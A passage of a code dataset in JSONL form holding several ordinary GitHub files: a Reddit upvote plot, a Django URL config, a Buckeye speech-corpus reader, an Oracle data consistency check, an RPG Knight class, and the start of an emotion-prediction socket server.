qty:\r\n number_of_posts+=ile\r\n\r\n# Create scatter plot\r\nplt.scatter(range(0,maxDepth), histo, s=qty * (1000/qty[0]), label='Size translates to quantity')\r\nplt.yscale('log', basey=2)\r\n\r\nplt.xticks(np.arange(0, 10, 1))\r\n\r\nplt.title('Average upvotes for each comment level depth \\n (All Comments until \"More comments...\")')\r\nplt.xlabel('Comment level depth')\r\nplt.ylabel('Avg. Upvotes')\r\n\r\nlegend = plt.legend(loc='upper right', shadow=True, fontsize='medium')\r\nlegend.get_frame().set_facecolor('ivory')\r\n\r\nprint(number_of_posts)\r\n\r\nplt.show()\r\n","repo_name":"matkurek/redditCommentsDepth","sub_path":"Depths.py","file_name":"Depths.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7625616279","text":"from django.contrib import admin\nfrom django.conf import settings\nfrom django.urls import include, path\nfrom eTutor import views as etutor_views\nfrom django.conf.urls import url\n\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', etutor_views.homePage, name=\"homepage\"),\n path('accounts/', include('registration.backends.simple.urls')),\n path('users/', etutor_views.usersPage, name=\"all_users\"),\n path('rooms/', etutor_views.public_rooms, name=\"all_rooms\"),\n path('my_dms/', etutor_views.my_dms),\n path('rooms/<int:pk>/', etutor_views.room_detail),\n path('rooms/<int:pk>/dm_users/', etutor_views.dm_users),\n path('rooms/<int:pk>/message_read/', etutor_views.message_read),\n path('videoChat/', etutor_views.video_chat, name=\"video_chat\"),\n url(r'token$', etutor_views.token, name=\"token\"),\n path('direct_message/', etutor_views.direct_message),\n path('edit/', etutor_views.user_edit, name=\"user_edit\"),\n path('users/friend_request', etutor_views.friend_request),\n path('users/like/', etutor_views.like, name=\"like\"),\n path('users/dislike/', etutor_views.dislike, name=\"dislike\"),\n path('my_friends/', etutor_views.my_friends),\n path('friend_requests/', etutor_views.friend_requests),\n path('notification/get/', etutor_views.get_notifications),\n path('friend_requests/mark_read', etutor_views.mark_read),\n path('rooms/<int:pk>/new_dm/', etutor_views.new_dm),\n]\n\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns = [\n path('__debug__/', include(debug_toolbar.urls)),\n\n # For django versions before 2.0:\n # url(r'^__debug__/', include(debug_toolbar.urls)),\n ] + urlpatterns\n","repo_name":"momentum-Tutor/eTutor","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36233462377","text":"\"\"\"Classes and functions to read and loop through the Buckeye Corpus.\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n\nimport bisect\nimport glob\nimport io\nimport os.path\nimport re\nimport wave\nimport zipfile\n\nfrom .containers import Word, Pause, LogEntry, Phone\n\n\nSPEAKERS = {'s01': ('f', 'y', 'f'), 's02': ('f', 'o', 'm'),\n 's03': ('m', 'o', 'm'), 's04': ('f', 'y', 'f'),\n 's05': ('f', 'o', 'f'), 's06': ('m', 'y', 'f'),\n 's07': ('f', 'o', 'f'), 's08': ('f', 'y', 'f'),\n 's09': ('f', 'y', 'f'), 's10': ('m', 'o', 'f'),\n 's11': ('m', 'y', 'm'), 's12': ('f', 'y', 'm'),\n 's13': ('m', 'y', 'f'), 's14': ('f', 'o', 'f'),\n 's15': ('m', 'y', 'm'), 's16': ('f', 'o', 'm'),\n 's17': ('f', 'o', 'm'), 's18': 
('f', 'o', 'f'),\n 's19': ('m', 'o', 'f'), 's20': ('f', 'o', 'f'),\n 's21': ('f', 'y', 'm'), 's22': ('m', 'o', 'f'),\n 's23': ('m', 'o', 'm'), 's24': ('m', 'o', 'm'),\n 's25': ('f', 'o', 'm'), 's26': ('f', 'y', 'f'),\n 's27': ('f', 'o', 'm'), 's28': ('m', 'y', 'm'),\n 's29': ('m', 'o', 'f'), 's30': ('m', 'y', 'm'),\n 's31': ('f', 'y', 'm'), 's32': ('m', 'y', 'f'),\n 's33': ('m', 'y', 'f'), 's34': ('m', 'y', 'm'),\n 's35': ('m', 'o', 'm'), 's36': ('m', 'o', 'f'),\n 's37': ('f', 'y', 'm'), 's38': ('m', 'o', 'm'),\n 's39': ('f', 'y', 'm'), 's40': ('m', 'y', 'f')}\n\n\nTRACK_RE = r's[0-4][0-9]/s[0-4][0-9]0[0-6][ab]\\.zip'\n\n\nclass Speaker(object):\n \"\"\"Iterable of Track instances for one Buckeye speaker, with metadata.\n\n Use Speaker.from_zip(path) to initialize a Speaker from a single zip file.\n\n Parameters\n ----------\n name : str\n Code-name for the speaker in the Buckeye Corpus (e.g., 's01').\n\n tracks : list of Track\n Track instances containing the annotations and recordings for this\n speaker, as read from e.g. s0101a.zip, s0101b.zip, etc.\n\n Attributes\n ----------\n name : str\n Code-name for the speaker in the Buckeye Corpus (e.g., 's01').\n\n sex : str\n Sex of the speaker ('f' for female or 'm' for male)\n\n age : str\n Age of the speaker ('o' for older than 40, 'y' for younger)\n\n interviewer : str\n Sex of the person who interviewed the speaker ('f' or 'm')\n\n tracks : list of Track\n Track instances containing the annotations and recordings for this\n speaker, as read from e.g. s0101a.zip, s0101b.zip, etc.\n\n \"\"\"\n\n def __init__(self, name, tracks):\n self.name = name\n self.sex, self.age, self.interviewer = SPEAKERS[self.name]\n self.tracks = tracks\n\n @classmethod\n def from_zip(cls, path, load_wavs=False):\n \"\"\"Return a Speaker instance from a zip file.\n\n Parameters\n ----------\n path : str\n Path to a zipped speaker archive (e.g., 's01.zip').\n\n load_wavs : bool, optional\n If True, the .wav files in the archive are read into the Track\n instances, in addition to the text annotations. 
Default is False.\n\n Returns\n -------\n Speaker\n\n \"\"\"\n\n name = os.path.splitext(os.path.basename(path))[0]\n\n tracks = []\n\n speaker = zipfile.ZipFile(path)\n\n for zip_path in sorted(speaker.namelist()):\n if re.match(TRACK_RE, zip_path):\n data = zipfile.ZipFile(io.BytesIO(speaker.read(zip_path)))\n tracks.append(Track.from_zip(zip_path, data, load_wavs))\n\n speaker.close()\n\n return cls(name, tracks)\n\n def __iter__(self):\n return iter(self.tracks)\n\n def __getitem__(self, i):\n return self.tracks[i]\n\n def __repr__(self):\n return 'Speaker(\"{}\")'.format(self.name)\n\n def __str__(self):\n return '<Speaker {} ({}, {})>'.format(self.name, self.sex, self.age)\n\n\nclass Track(object):\n \"\"\"Corpus data from one track archive file (e.g., s0101a.zip).\n\n Use Track.from_zip(path) to initialize a Track from a single zip file.\n\n Parameters\n ----------\n name : str\n Name of the track file (e.g., 's0101a')\n\n words : str or file\n Path to the .words file associated with this track (e.g.,\n 's0101a.words'), or an open file(-like) object.\n\n phones : str or file\n Path to the .phones file associated with this track (e.g.,\n 's0101a.phones'), or an open file(-like) object.\n\n log : str or file\n Path to the .log file associated with this track (e.g.,\n 's0101a.log'), or an open file(-like) object.\n\n txt : str or file\n Path to the .txt file associated with this track (e.g.,\n 's0101a.txt'), or an open file(-like) object.\n\n wav : str or file, optional\n Path to the .wav file associated with this track (e.g.,\n 's0101a.wav'), or an open file(-like) object.\n\n Attributes\n ----------\n name : str\n Name of the track file (e.g., 's0101a')\n\n words : list of Word and Pause\n Chronological list of Word and Pause instances that are\n constructed from the .words file in this track.\n\n phones : list of Phone\n Chronological list of Phone instances that are constructed from\n the .phones file in this track.\n\n log : list of LogEntry\n Chronological list of LogEntry instances that are constructed from\n the .log file in this track.\n\n txt : list of str\n Chronological list of transcriptions of each turn from the .txt\n file in this track (not time-aligned).\n\n wav : wave.Wave_read\n An open wave.Wave_read instance for the .wav file in this track.\n If this track was constructed with `load_wav=False`, this\n attribute is not present.\n\n \"\"\"\n\n def __init__(self, name, words, phones, log, txt, wav=None):\n self.name = name\n\n # read and store text info\n if not hasattr(words, 'readline'):\n words = io.open(words, encoding='latin-1')\n\n self.words = list(process_words(words))\n words.close()\n\n if not hasattr(phones, 'readline'):\n phones = io.open(phones, encoding='latin-1')\n\n self.phones = list(process_phones(phones))\n phones.close()\n\n if not hasattr(log, 'readline'):\n log = io.open(log, encoding='latin-1')\n\n self.log = list(process_logs(log))\n log.close()\n\n if not hasattr(txt, 'readline'):\n txt = io.open(txt, encoding='latin-1')\n\n self.txt = txt.read().splitlines()\n txt.close()\n\n # optionally store the sound file\n if wav is not None:\n self.wav = wave.open(wav)\n\n # add references in self.words to the corresponding self.phones\n self._set_phones()\n\n # make a list of the log entry timestamps to quickly search later\n self._log_begs = [l.beg for l in self.log]\n self._log_ends = [l.end for l in self.log]\n\n def __repr__(self):\n return 'Track(\"{}\")'.format(self.name)\n\n def __str__(self):\n return '<Track {}>'.format(self.name)\n\n @classmethod\n def from_zip(cls, path, 
data=None, load_wav=False):\n \"\"\"Return a Track instance from a zip file.\n\n Parameters\n ----------\n path : str\n Path to a zipped track archive (e.g., 's01/s0101a.zip').\n\n data : zipfile.ZipFile, optional\n ZipFile instance containing track data, required if `path`\n points to a zipped archive nested inside another archive. Default\n is None.\n\n load_wav : bool, optional\n If True, the .wav file will be read into the Track instance, in\n addition to the text annotations. Default is False.\n\n Returns\n -------\n Track\n\n \"\"\"\n\n if data is None:\n data = zipfile.ZipFile(path)\n\n name = os.path.splitext(os.path.basename(path))[0]\n\n words = io.StringIO(data.read(name + '.words').decode('latin-1'))\n phones = io.StringIO(data.read(name + '.phones').decode('latin-1'))\n log = io.StringIO(data.read(name + '.log').decode('latin-1'))\n txt = io.StringIO(data.read(name + '.txt').decode('latin-1'))\n\n if load_wav:\n wav = io.BytesIO(data.read(name + '.wav'))\n\n else:\n wav = None\n\n return cls(name, words, phones, log, txt, wav)\n\n def _set_phones(self):\n \"\"\"\n Private method used to add references in each Word and Pause\n instance to the corresponding Phone instances in this track.\n\n Notes\n -----\n A Phone is counted as belonging to a Word or Pause if at least\n half of the Phone's duration occurs between the `beg` and `end`\n timestamps of the Word or Pause.\n\n \"\"\"\n\n phone_mids = [p.beg + 0.5 * p.dur for p in self.phones]\n\n for word in self.words:\n left = bisect.bisect_left(phone_mids, word.beg)\n right = bisect.bisect_left(phone_mids, word.end)\n\n word._phones = self.phones[left:right]\n\n def clip_wav(self, clip, beg, end):\n \"\"\"Write a new .wav file containing a clip from this track.\n\n Parameters\n ----------\n clip : str\n Path to the new .wav file.\n\n beg : float\n Time in the track .wav file where the clip should begin.\n\n end : float\n Time in the track .wav file where the clip should end.\n\n Returns\n -------\n None\n\n \"\"\"\n\n framerate = self.wav.getframerate()\n length = end - beg\n\n frames = int(round(length * framerate))\n beg_frame = int(round(beg * framerate))\n\n wav_out = wave.open(clip, 'wb')\n\n wav_out.setparams(self.wav.getparams())\n self.wav.setpos(beg_frame)\n wav_out.writeframes(self.wav.readframes(frames))\n\n wav_out.close()\n\n def get_logs(self, beg, end):\n \"\"\"Return log entries that overlap with a given interval.\n\n The interval does not include the log entry boundaries. For\n example, calling `get_logs(1.5, 2)` will not return a log entry\n that extends from 1.25 seconds to 1.5 seconds, or one that\n extends from 2 seconds to 2.5 seconds.\n\n Parameters\n ----------\n beg : float\n Beginning of the interval.\n\n end : float\n End of the interval.\n\n Returns\n -------\n logs : list of LogEntry\n List of references to the LogEntry instances in this track\n that overlap with the interval given by `[beg, end]`.\n\n \"\"\"\n\n left_idx = bisect.bisect(self._log_ends, beg)\n right_idx = bisect.bisect_left(self._log_begs, end)\n\n return self.log[left_idx:right_idx]\n\n\ndef corpus(path, load_wavs=False):\n \"\"\"Yield Speaker instances from a folder of zipped speaker archives.\n\n Parameters\n ----------\n path : str\n Path to a directory containing all of the zipped speaker archives\n in the Buckeye Corpus (s01.zip, s02.zip, ..., s40.zip).\n\n load_wavs : bool, optional\n If True, the .wav files are read into the Track instances in the\n yielded Speaker instances. 
Default is False.\n\n Yields\n ------\n Speaker\n One Speaker instance for each zipped speaker archive in the\n folder given by `path`.\n\n \"\"\"\n\n zip_paths = sorted(glob.glob(os.path.join(path, 's[0-4][0-9].zip')))\n\n for zip_path in zip_paths:\n yield Speaker.from_zip(zip_path, load_wavs)\n\n\ndef process_logs(logs):\n \"\"\"Yield LogEntry instances from a .log file in the Buckeye Corpus.\n\n Parameters\n ----------\n logs : file-like\n Open file-like object created from a .log file in the Buckeye\n Corpus.\n\n Yields\n ------\n LogEntry\n One LogEntry instance for each entry in the .log file, in\n chronological order.\n\n \"\"\"\n\n # skip the header\n line = logs.readline()\n\n while not line.startswith('#'):\n if line == '':\n raise EOFError\n\n line = logs.readline()\n\n line = logs.readline()\n\n # iterate over entries\n previous = 0.0\n while line != '':\n try:\n time, color, entry = line.split(None, 2)\n entry = entry.strip()\n\n except ValueError:\n if line == '\\n':\n line = logs.readline()\n continue\n\n time, color = line.split()\n entry = None\n\n time = float(time)\n yield LogEntry(entry, previous, time)\n\n previous = time\n line = logs.readline()\n\n\ndef process_phones(phones):\n \"\"\"Yield Phone instances from a .phones file in the Buckeye Corpus.\n\n Parameters\n ----------\n phones : file-like\n Open file-like object created from a .phones file in the Buckeye\n Corpus.\n\n Yields\n ------\n Phone\n One Phone instance for each entry in the .phones file, in\n chronological order.\n\n \"\"\"\n\n # skip the header\n line = phones.readline()\n\n while not line.startswith('#'):\n if line == '':\n raise EOFError\n\n line = phones.readline()\n\n line = phones.readline()\n\n # iterate over entries\n previous = 0.0\n while line != '':\n try:\n time, color, phone = line.split(None, 2)\n\n if '+1' in phone:\n phone = phone.replace('+1', '')\n\n if ';' in phone:\n phone = phone.split(';')[0]\n\n phone = phone.strip()\n\n except ValueError:\n if line == '\\n':\n line = phones.readline()\n continue\n\n time, color = line.split()\n phone = None\n\n time = float(time)\n yield Phone(phone, previous, time)\n\n previous = time\n line = phones.readline()\n\n\ndef process_words(words):\n \"\"\"Yield Word and Pause instances from a .words file.\n\n Parameters\n ----------\n words : file-like\n Open file-like object created from a .words file in the Buckeye\n Corpus.\n\n Yields\n ------\n Word, Pause\n One Word or Pause instance for each entry in the .words file, in\n chronological order. Entries that begin with '{' or '<' are\n yielded as Pause instances. 
All other entries are yielded as Word\n instances.\n\n \"\"\"\n\n # skip the header\n line = words.readline()\n\n while not line.startswith('#'):\n if line == '':\n raise EOFError\n\n line = words.readline()\n\n line = words.readline()\n\n # iterate over entries\n previous = 0.0\n while line != '':\n fields = [l.strip() for l in line.strip().split(';')]\n\n try:\n word, phonemic, phonetic, pos = fields\n phonemic = phonemic.split()\n phonetic = phonetic.split()\n\n except ValueError:\n if line == '\\n':\n line = words.readline()\n continue\n\n # 22 entries have missing fields, including 11 CUTOFF, ERROR, and\n # E_TRANS entries\n if len(fields) == 2:\n word, pos = fields\n phonemic = None\n\n elif len(fields) == 3:\n word, phonemic, pos = fields\n phonemic = phonemic.split()\n\n phonetic = None\n\n # s1801a has a missing newline in the first entry, with SIL and\n # B_TRANS on the same line with the same timestamp\n time, color, word = (w.strip() for w in word.split(None, 2))\n\n time = float(time)\n\n # 1603b starts at -1.0s, and 2801a has one line that has a timestamp\n # that precedes the timestamp on the previous line\n # for these entries, the misaligned attribute will be set to True\n\n if word.startswith('<') or word.startswith('{'):\n yield Pause(word, previous, time)\n\n else:\n yield Word(word, previous, time, phonemic, phonetic, pos)\n\n previous = time\n line = words.readline()\n","repo_name":"scjs/buckeye","sub_path":"buckeye/buckeye.py","file_name":"buckeye.py","file_ext":"py","file_size_in_byte":16047,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"24612471261","text":"print('smth\\n'\r\n '\\n'\r\n 'Wait for further instructions...')\r\n\r\n\r\nimport cx_Oracle as cx\r\nimport pandas as pd\r\nimport datetime\r\nimport sys\r\nimport os\r\nimport numpy as np\r\n\r\nyear_input = int(input('Type year:'))\r\nmonth_input = int(input('Type month:'))\r\n\r\nprint('Connecting to DWH1...')\r\ndsn_new = \"\"\"\r\n#connection just like Oracle likes \r\n\"\"\"\r\nconnection_new = cx.connect(..., dsn_new)\r\n\r\nprint('Query in progress...')\r\n\r\nquery_new = \"\"\"select *\r\n from _\r\n where _ is not null\"\"\"\r\n\r\nbank_subs = pd.read_sql(query_new,\r\n con=connection_new,\r\n index_col='APP_NUMBER',\r\n parse_dates=['PERIOD_DT',\r\n 'CONTRACT_DT',\r\n 'RETAIL_DT',\r\n 'DELIVERY_DT',\r\n 'REGISTRION_DT',\r\n ]\r\n )\r\n\r\nprint('Connecting to DWH2...')\r\n\r\ndsn = \"\"\"!!!\r\n\"\"\"\r\nconnection = cx.connect(\"!!!\", dsn)\r\n\r\nprint('Query in progress...')\r\n\r\n\r\nquery = open(\"query_indicator.sql\", \"r\").read()\r\n\r\nquery = query.format(year_input, month_input)\r\n\r\nind_month = pd.read_sql(query,\r\n con=connection,\r\n index_col='APP_NUMBER',\r\n parse_dates=['DATE',\r\n 'BIRTHDAY',\r\n 'DATE',\r\n ]\r\n )\r\n\r\nprint('Checking for input period:')\r\n\r\nif ((bank_subs['PERIOD_DT'].dt.month == month_input) &\r\n (year_input == bank_subs['PERIOD_DT'].dt.year)).any():\r\n\r\n print('')\r\n print(bank_subs.groupby(['PERIOD_DT']).agg(['count']))\r\n print('')\r\n print(ind_month.groupby(['M_', 'Y_']).agg(['count']))\r\n\r\n\r\n\r\n proceed = input('Do you wish to proceed?' \\\r\n '(Y/N): ').lower()\r\n\r\n if proceed == 'n':\r\n sys.exit()\r\n elif proceed != 'y':\r\n while proceed != 'y' and proceed != 'n':\r\n proceed = input('Incorrent input. 
\\n' \\\r\n 'Try again: ')\r\n if proceed == 'n':\r\n sys.exit()\r\nelse:\r\n print('Month or year do not match input number on dm_sm.bank_subsidy.')\r\n sys.exit()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"timofeykl/consistency_check","sub_path":"test_prog.py","file_name":"test_prog.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32233712135","text":"# Python RPG\n# Alex Galhardo Vieira\n# https://github.com/AlexGalhardo/Python-RPG\n# aleexgvieira@gmail.com\n# https://alexgalhardo.com\n\n# !/usr/bin/python3\n# coding: utf-8 \n\n# ./Python/Characters/Knight.py\n\nfrom SuperClass.Character import Character\nfrom SuperClass.Warrior import\tWarrior\nfrom random import randint\nfrom SuperClass.GameStatistics import GameStatistics\n\nfrom Global.GLOBAL_CHARACTERS_VARIABLES import KNIGHT_INITIAL_LIFE, \\\n\t\t\t\t\t\t\t\t\t\t\t KNIGHT_INITIAL_MANA, \\\n\t\t\t\t\t\t\t\t\t\t\t KNIGHT_ADD_MANA_FOR_LEVEL, \\\n\t\t\t\t\t\t\t\t\t\t\t KNIGHT_ADD_LIFE_FOR_LEVEL, \\\n\t\t\t\t\t\t\t\t\t\t\t KNIGHT_REG_LIFE_EACH_TURN, \\\n\t\t\t\t\t\t\t\t\t\t\t KNIGHT_REG_MANA_EACH_TURN, \\\n\t\t\t\t\t\t\t\t\t KNIGHT_LIGHT_SPELL_MANA_USED, \\\n\t\t\t\t\t\t\t\t\t KNIGHT_MEDIUM_SPELL_MANA_USED, \\\n\t\t\t\t\t\t\t\t\t KNIGHT_STRONG_SPELL_MANA_USED\n\n\nclass Knight(Warrior):\n\n\t'''\n\t-- Herance livingBeing\n\n\tself.totalLife\n\tself.currentlyLife\n\tdef setLiveBeingTotalLife( $setLiveBeingTotalLife )\n\tdeffunction getLiveBeingTotalLife()\n\t'''\n\n\t'''\n\t-- Herance Character\n\tself.characterName\n\tself.characterVocation\n\n\tself.currentlyLevel\n\tself.currentlyXP\n\tself.xpToNextLevel\n\n\tself.totalMana\n\tself.currentlyMana\n\n\tself.totalCapacity\n\tself.currentlyCapacity\n\n\tself.magicLevel\n\tself.manaUsedToNextMagicLevel\n\tself.totalManaUsed\n\n\tdef getCharacterVocation()\n\tdef getCharacterXPToNextLevel()\n\tdef getCharacterCurrentlyMagicLevel()\n\tdef getCharacterCurrentlyLevel()\n\tdef getCharacterCurrentlyMana()\n\tdef getCharacterCurrentlyLife()\n\tdef getCharacterCurrentlyXP()\n\tdef getCharacterTotalManaUsedToNextLevel()\n\tdef getCharacterXPToNextLevel()\n\t'''\n\n\t'''\n\t-- Herance Warrior\n\tself.warriorWeaponAttack\n\tself.warriorWeaponSkillLevel\n\tself.warriorTotalAttacks\n\tself.warriorTotalAttacksToNextWeaponSkillLevel\n\n\tdef setWarriorWeaponAttack(self, characterWeaponAttack )\n\tdef getWarriorWeaponAttack(self)\n\tdef getWarriorTotalAttacksToNextWeaponSkillLevel(self)\n\tdef getWarriorWeaponSkillLevel(self)\n\t'''\n\n\tdef __init__(self,\n\t\t\t\t characterName,\n\t\t\t\t warriorWeaponAttack):\n\n\t\t# constructor warrior superclass\n\t\tsuper().__init__( KNIGHT_INITIAL_LIFE,\n\t\t\t characterName,\n\t\t\t\t\t\t warriorWeaponAttack )\n\n\t\tself.knightTotalMana = KNIGHT_INITIAL_MANA\n\n\t\tself.characterVocation = \"Knight\"\n\n\t\tself.characterCurrentlyMana = KNIGHT_INITIAL_MANA\n\n\t\tself.knightManaUsedToNextMagicLevel = 200\n\n\tdef getLightSpellManaUsed(self):\n\t\treturn KNIGHT_LIGHT_SPELL_MANA_USED\n\n\tdef getMediumSpellManaUsed(self):\n\t\treturn KNIGHT_MEDIUM_SPELL_MANA_USED\n\n\tdef getStrongSpellManaUsed(self):\n\t\treturn KNIGHT_STRONG_SPELL_MANA_USED\n\n\tdef getKnightTotalMana(self):\n\t\treturn self.knightTotalMana\n\n\tdef getKnightManaUsedToNextMagicLevel(self):\n\t\treturn self.knightManaUsedToNextMagicLevel\n\n\tdef getCharacterCurrentlyMana(self):\n\t\treturn self.characterCurrentlyMana\n\n\tdef useLightSpell(self):\n\n\t\tif 
self.getCharacterCurrentlyMana() >= self.getLightSpellManaUsed():\n\n\t\t\tbaseAttack = self.getWarriorWeaponSkillLevel() * self.getWarriorWeaponAttack()\n\t\t\tbaseAttackFirst = baseAttack * 1.2\n\t\t\tbaseAttackSecond = baseAttack * 1.5\n\n\t\t\tprint('\\n\\t ' + self.getCharacterName() + \" says: Abracadabraaa\")\n\n\t\t\tspellDamage = randint(int(baseAttackFirst), int(baseAttackSecond))\n\n\t\t\tprint('\\t Spell Damage: {}'.format(spellDamage))\n\n\t\t\tGameStatistics.totalManaUsed += self.getLightSpellManaUsed()\n\t\t\tself.characterCurrentlyMana -= self.getLightSpellManaUsed()\n\n\t\t\t# update magic level\n\t\t\tif( self.getCharacterTotalManaUsed() >= self.getKnightManaUsedToNextMagicLevel() ):\n\t\t\t\tself.characterCurrentlyMagicLevel += 1\n\t\t\t\tprint('\\n\\t ...Magic Level UP!')\n\t\t\t\tprint('\\t Currently Magic Level: {}'.format(self.getCharacterCurrentlyMagicLevel()))\n\t\t\t\tself.knightManaUsedToNextMagicLevel *= 5\n\t\t\t\tprint('\\t Mana to Use to next Magic Level: {}\\n'.format(self.getKnightManaUsedToNextMagicLevel()))\n\n\n\t\t\treturn spellDamage\n\n\t\telse:\n\t\t\tprint('\\t Don\\\'t have sufficient mana! Need at least {} mana points.'.format(self.getLightSpellManaUsed()))\n\t\t\treturn 0\n\n\n\tdef useMediumSpell(self):\n\n\t\tif self.getCharacterCurrentlyMana() >= self.getMediumSpellManaUsed():\n\n\t\t\tbaseAttack = self.getWarriorWeaponSkillLevel() * self.getWarriorWeaponAttack()\n\t\t\tbaseAttackFirst = baseAttack * 1.7\n\t\t\tbaseAttackSecond = baseAttack * 2.5\n\n\t\t\tprint('\\n\\t ' + self.getCharacterName() + \" says: Petrificus Totalus\")\n\n\t\t\tspellDamage = randint(int(baseAttackFirst), int(baseAttackSecond))\n\n\t\t\tprint('\\t Spell Damage: {}'.format(spellDamage))\n\n\t\t\tGameStatistics.totalManaUsed += self.getMediumSpellManaUsed()\n\t\t\tself.characterCurrentlyMana -= self.getMediumSpellManaUsed()\n\n\t\t\t# update magic level\n\t\t\tif( self.getCharacterTotalManaUsed() >= self.getKnightManaUsedToNextMagicLevel() ):\n\t\t\t\tself.characterCurrentlyMagicLevel += 1\n\t\t\t\tprint('\\n\\t ...Magic Level UP!')\n\t\t\t\tprint('\\t Currently Magic Level: {}'.format(self.getCharacterCurrentlyMagicLevel()))\n\t\t\t\tself.knightManaUsedToNextMagicLevel *= 5\n\t\t\t\tprint('\\t Mana to Use to next Magic Level: {}\\n'.format(self.getKnightManaUsedToNextMagicLevel()))\n\n\n\t\t\treturn spellDamage\n\n\t\telse:\n\t\t\tprint('\\t Don\\\'t have sufficient mana! 
Need at least {} mana points.'.format(self.getMediumSpellManaUsed()))\n\t\t\treturn 0\n\n\n\tdef useStrongSpell(self):\n\n\t\tif self.getCharacterCurrentlyMana() >= self.getStrongSpellManaUsed():\n\n\t\t\tbaseAttack = self.getWarriorWeaponSkillLevel() * self.getWarriorWeaponAttack()\n\t\t\tbaseAttackFirst = int(baseAttack * 2.2)\n\t\t\tbaseAttackSecond = int(baseAttack * 3.0)\n\n\t\t\tprint('\\n\\t ' + self.getCharacterName() + \" says: Exori Gran\")\n\n\t\t\tspellDamage = randint(baseAttackFirst, baseAttackSecond)\n\n\t\t\tprint('\\t Spell Damage: {}'.format(spellDamage))\n\n\t\t\tGameStatistics.totalManaUsed += self.getStrongSpellManaUsed()\n\t\t\tself.characterCurrentlyMana -= self.getStrongSpellManaUsed()\n\n\t\t\t# update magic level\n\t\t\tif( self.getCharacterTotalManaUsed() >= self.getKnightManaUsedToNextMagicLevel() ):\n\t\t\t\tself.characterCurrentlyMagicLevel += 1\n\t\t\t\tprint('\\n\\t ...Magic Level UP!')\n\t\t\t\tprint('\\t Currently Magic Level: {}'.format(self.getCharacterCurrentlyMagicLevel()))\n\t\t\t\tself.knightManaUsedToNextMagicLevel *= 5\n\t\t\t\tprint('\\t Mana to Use to next Magic Level: {}\\n'.format(self.getKnightManaUsedToNextMagicLevel()))\n\n\t\t\treturn spellDamage\n\n\t\telse:\n\t\t\tprint('\\t Don\\\'t have sufficient mana! Need at least {} mana points.'.format(self.getStrongSpellManaUsed()))\n\t\t\treturn 0\n\n\n\tdef Regenerate(self):\n\n\t\tself.livingBeingCurrentlyLife += KNIGHT_REG_LIFE_EACH_TURN\n\t\tprint('\\t Player Regenerated {} points of life.'.format(KNIGHT_REG_LIFE_EACH_TURN))\n\t\tif self.getLivingBeingCurrentlyLife() > self.getLivingBeingTotalLife():\n\t\t\tprint('\\t Health is full.')\n\t\t\tself.livingBeingCurrentlyLife = self.livingBeingTotalLife\n\n\t\tself.characterCurrentlyMana += KNIGHT_REG_MANA_EACH_TURN\n\t\tprint('\\t Player Regenerated {} points of mana.'.format(KNIGHT_REG_MANA_EACH_TURN))\n\t\tif self.getCharacterCurrentlyMana() > self.getKnightTotalMana():\n\t\t\tprint('\\t Mana is full.')\n\t\t\tself.characterCurrentlyMana = self.knightTotalMana\n\n\tdef Update(self):\n\n\t\tif self.getCharacterCurrentlyXP() >= self.getCharacterXPToNextLevel():\n\t\t\tself.characterXPToNextLevel *= 2\n\t\t\tself.characterCurrentlyLevel += 1\n\t\t\tself.knightTotalMana += KNIGHT_ADD_MANA_FOR_LEVEL\n\t\t\tself.livingBeingTotalLife += KNIGHT_ADD_LIFE_FOR_LEVEL\n\t\t\tprint('\\n\\t ... 
PLAYER LEVEL UP!')\n\t\t\tprint('\\t Total Life + {} points!'.format(KNIGHT_ADD_LIFE_FOR_LEVEL))\n\t\t\tprint('\\t Total Mana + {} points!'.format(KNIGHT_ADD_MANA_FOR_LEVEL))\n\t\t\tprint('\\t Currently Player Level: {}'.format(self.getCharacterCurrentlyLevel()))\n\t\t\tprint('\\t Experience to next level: {}'.format(self.getCharacterXPToNextLevel()))\n\n\t\tif self.getWarriorTotalAttacks() >= self.getWarriorTotalAttacksToNextWeaponSkillLevel():\n\t\t\tprint(\"\\t ...Weapon Skill UP!\")\n\t\t\tprint('\\t Weapon Skill Level: {}'.format(self.getWarriorWeaponSkillLevel()))\n\t\t\tself.warriorTotalAttacksToNextWeaponSkillLevel *= 2\n\t\t\tprint('\\t Total Hits to next Level: {}'.format(self.getWarriorTotalAttacksToNextWeaponSkillLevel()))\n","repo_name":"AlexGalhardo/Python-CLI-Turn-Based-RPG","sub_path":"Characters/Knight.py","file_name":"Knight.py","file_ext":"py","file_size_in_byte":7878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16223719707","text":"import socket\r\nimport tensorflow as tf\r\nimport cv2\r\nimport predictServer as predict\r\n\r\nMODEL_DIR = \"D:\\\\Users\\\\eddy_\\\\Documents\\\\Master-Thesis\\\\Python\\\\CNN\\\\Models\\\\model_2emotions_30.hdf5\"\r\nCASCADE_DIR = \"D:\\\\Users\\\\eddy_\\\\Documents\\\\Master-Thesis\\\\Python\\\\Examples\\\\TrainedCNN\\\\haarcascade_frontalface_alt.xml\"\r\n\r\n#### INITIALIZE CASCADE AND CNN MODEL\r\nface_cascade = cv2.CascadeClassifier(CASCADE_DIR)\r\nmodel = tf.keras.models.load_model(MODEL_DIR)\r\n\r\n#### TEST MODEL BY PREDICTING A TEST IMAGE\r\n#### (First prediction takes longer, don't want this to happen in real time)\r\ninitialize_image = cv2.imread('test.jpg', cv2.IMREAD_GRAYSCALE)\r\nemo = predict.predict(model, initialize_image)\r\n#print(\"Initialized Model Predictor, returned: \", emo)\r\n\r\nSERVER_IP = '192.168.1.33'\r\nPORT = 1026\r\nHEADER_SIZE = 10\r\nc2 = 0\r\n\r\n#### INITIALIZE SOCKET COMMUNICATION\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.bind((SERVER_IP, 